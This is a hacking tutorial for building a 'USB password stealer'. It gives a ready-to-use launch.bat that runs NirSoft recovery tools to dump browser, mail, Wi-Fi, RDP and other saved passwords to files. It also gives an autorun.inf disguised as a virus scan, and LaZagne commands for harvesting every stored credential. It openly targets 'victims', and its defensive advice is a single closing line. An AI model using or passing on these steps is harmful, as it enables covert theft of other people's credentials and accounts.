Hello friends how are you? I am going to tell you today how you can hack all the password stored on a computer with a simple trick. As we all now many computer users due to lack of time simply just store their login details in their browsers. And the good new is that there are a lot of tools available over the internet that can help you recover Saved Passwords so in this article, we will gather those passwords by Creating USB Password Stealer And Get All Passwords From The Victims Computer so let’s get into it.
Create USB Password Stealer:-
So what things we will need first and most important thing that we need is a USB Flash drive after that we need some password recovery tools and NirSoft has a ton of tools that we can use. We’re going to use a few that recover passwords to create our ultimate USB tool.
Now the tools I am using can be downloaded from here following are the name of tools that we are going to use:-
- Mail PassView
- Protected Storage PassView
- Network Password Recovery
- SniffPass Password Sniffer
- Remote Desktop PassView
After you have downloaded these files move them to your USB.
Creating AutoRun Script (Work only on Windows XP):-
So the next step is to create an Autorun script so we don’t have to do manual work. But unfortunately the autorun have been disabled on Windows 7 and above so is your target is a Windows XP user then we will create a file with the following Details.
File Name: autorun.inf
Edit it with notepad and paste the following code in it:-
ACTION= Perform a Virus Scan
Now we need to create a .bat file with will run the tools and gather passwords from the computer.
File Name: launch.bat
and paste the following script in it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
For Windows 7 and Above:-
So now for the users running Windows 7 and above the simple thing what you can do is just plug in you USB password stealer into victims computer and Run launch.bat and it will do all the work for you.
And now you have hacked all the passwords stored on that computer.
The LaZagne Project !!! An all in One Password Recovery Tool:-
The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
It is a really cool tool that can be used for the same reason. Here you can get the full source code of the tool. GitHub Lazagne
You can download the executable windows file from here:-
Standalone Executable: https://github.com/AlessandroZ/LaZagne/releases/
The cool this about this tools is that it is available for Linux.
Here is how you can use it.
- Retrieve version
- Launch all modules
- Launch only a specific module
- Launch only a specific software script
laZagne.exe browsers -f (for firefox)
- Write all passwords found into a file (-oN for Normal txt, -oJ for Json, -oA for All)
laZagne.exe all -oN
- Get help
laZagne.exe -h laZagne.exe browsers -h
- Use a file for dictionary attacks (used only when it’s necessary: mozilla masterpassword, system hahes, etc.). The file has to be a wordlist in cleartext (no rainbow), it has not been optmized to be fast but could useful for basic passwords.
laZagne.exe all -path file.txt
- Change verbosity mode (2 different levels)
laZagne.exe all -vv
Note: For wifi passwords \ Windows Secrets, launch it with administrator privileges (UAC Authentication / sudo)
Here is the list of software it support.
How to Protect From It.
Disable Autorun on your pc. Don’t plugin unknow USB drive in your pc.